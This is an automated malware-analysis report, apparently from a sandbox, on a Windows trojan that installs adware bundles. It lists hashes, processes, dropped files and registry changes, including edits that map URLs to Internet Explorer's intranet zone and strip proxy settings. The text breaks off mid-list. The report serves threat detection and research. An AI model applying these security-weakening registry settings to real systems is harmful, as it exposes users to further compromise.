Gen.Variant.Mikey.11140_7e90634f28
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Mikey.11140 (B) (Emsisoft), Gen:Variant.Mikey.11140 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 7e90634f28f2de92562f5f89c77a2266
SHA1: b8bc5194554d2076711b50493c64fad202df4d07
SHA256: baf060d2156879d97ee504c445d5da556c1d084b4d77878f0ca17475780bf5b9
SSDeep: 24576:mE2WFU20IskeQap2/hLA9lmEbyPhJFCNZ22akhPzRabLfbdigbQvmjTtLXaLnPMF:c20Uha8pulmRwakt9gLfbAgbQePtLXey
Size: 1432064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: WBNDY
Created at: 2015-06-28 12:38:06
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
BrowserHelper.exe:3952
Owxbocg.exe:3476
ping.exe:3544
ping.exe:2200
ping.exe:2440
ping.exe:3428
ping.exe:3660
ping.exe:3380
ping.exe:2616
ping.exe:2936
ping.exe:2448
ping.exe:3936
ping.exe:2192
ping.exe:1768
ping.exe:476
ping.exe:2624
ping.exe:3984
ping.exe:2828
ping.exe:2944
ping.exe:2820
ns19.tmp:3928
ins_sense.exe:2400
find.exe:1336
f.exe:3008
Wiwyiyugmbkl.exe:3564
sc.exe:3620
sc.exe:1368
sc.exe:3300
net.exe:3464
net.exe:3828
net1.exe:1388
net1.exe:3552
setup.exe:2060
setup.exe:3052
tcpsvcs.exe:2296
ins_geforce.exe:2388
ShopperPro.exe:2116
c98dc9.exe:3000
ins_shopperpro.exe:1204
regsvr32.exe:2224
%original file name%.exe:608
%original file name%.exe:2164
%original file name%.exe:2156
%original file name%.exe:576
%original file name%.exe:228
BROWSE~2.EXE:3668
The Trojan injects its code into the following process(es):
YTDownloader.exe:2380
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Owxbocg.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\vdutpty.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\bprbcxj.dll (5 bytes)
%Program Files%\Sense\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\pvmkp.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\ybviqo.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\63246 (39765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp (541196 bytes)
%WinDir%\Tasks\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.job (72 bytes)
%Program Files%\Sense\utils.exe (66065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\205121 (9520 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\zbacizheh.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\hcrejpusx.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\xlcieu.dll (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\vdutpty.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\bprbcxj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\pvmkp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\ybviqo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\63246 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\205121 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\zbacizheh.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\hcrejpusx.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\xlcieu.dll (0 bytes)
The process ins_sense.exe:2400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The process f.exe:3008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Owxbocg.exe (1217838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ybviqo.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Ltyvpos.tmp (332963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ikjtrx.dll (2028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\zbacizheh.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_c (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_b (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_a (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8593.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_e (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_d (129726 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Owxbocg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\zbacizheh.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ybviqo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ikjtrx.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Ltyvpos.tmp (0 bytes)
The process Wiwyiyugmbkl.exe:3564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (595014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\System.dll (784 bytes)
%WinDir%\Tasks\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\hdiyyhpn.dll (4 bytes)
%Program Files%\Ge-Force\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\eetruve.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\348421 (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\ewcryykvh.dll (5 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\vokcloqal.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\fejdf.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\kidpn.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y41BH0NX\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\caaig.dll (14 bytes)
%Program Files%\Ge-Force\utils.exe (65077 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\406185 (39553 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\ipgeoapi[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\406185 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\hdiyyhpn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\eetruve.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\348421 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\ewcryykvh.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\vokcloqal.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\fejdf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\kidpn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\caaig.dll (0 bytes)
The process setup.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\Updater.exe (25776 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\jsdrv.exe (100378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\AccDownload.dll (9320 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsProcess.dll (4 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (156512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\ns8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\MoreInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\jsdrv.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm7.tmp (0 bytes)
The process setup.exe:3052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44478 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (48500 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\ns19.tmp (6 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11035 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4236 bytes)
%Program Files%\YTDownloader\Updater.exe (17576 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10762 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\AccDownload.dll (9226 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Program Files%\Common Files\System\SysMenu.dll (15287 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20022 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsExec.dll (6 bytes)
%Program Files%\YTDownloader\converter.exe (61415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp (4 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsvE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp (0 bytes)
The process tcpsvcs.exe:2296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszA.tmp (242363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup1.exe (229796 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup.exe (0 bytes)
The process ins_geforce.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The process ShopperPro.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)
The process c98dc9.exe:3000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\caaig.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_e (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_d (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_a (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_c (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_b (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\vokcloqal.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\cnhwe.dll (2057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wptsit.tmp (333899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wiwyiyugmbkl.exe (1224639 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8593.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wiwyiyugmbkl.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\vokcloqal.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\cnhwe.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wptsit.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\caaig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp (0 bytes)
The process ins_shopperpro.exe:1204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (82355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup.exe (869966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup1.exe (79085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\D1958.dll (14 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\NK.lky (0 bytes)
The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_sense.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_geforce.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_shopperpro.exe (31368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UD6RSBGT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y41BH0NX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\bxsdk32.dll (9731 bytes)
Registry activity
The process BrowserHelper.exe:3952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 22 F8 65 1D F1 9E 15 9B FC 60 38 D3 C9 2A C8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
The process Owxbocg.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "70299"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Crossrider]
"Verifier" = "e779ddeb30ff0167256d26524544a5f7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "Sense"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"
[HKLM\SOFTWARE\Crossrider]
"Bic" = "13b4b43ecfec3569c696888aa234740eIE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Crossrider]
"Bic" = "13b4b43ecfec3569c696888aa234740eIE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 7E F7 AC 55 EB AB 66 8E 20 78 E6 D7 73 65 67"
[HKLM\SOFTWARE\Crossrider]
"Verifier" = "e779ddeb30ff0167256d26524544a5f7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "Sense"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"
[HKCU\Software\InstalledBrowserExtensions\Sense ]
"70299" = "Sense"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Sense "
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.36.01.22"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ping.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 CB 0F 8E AD F4 71 9C 28 36 D2 57 6F CE 3B 65"
The process ping.exe:2200 makes changes in the system registry.
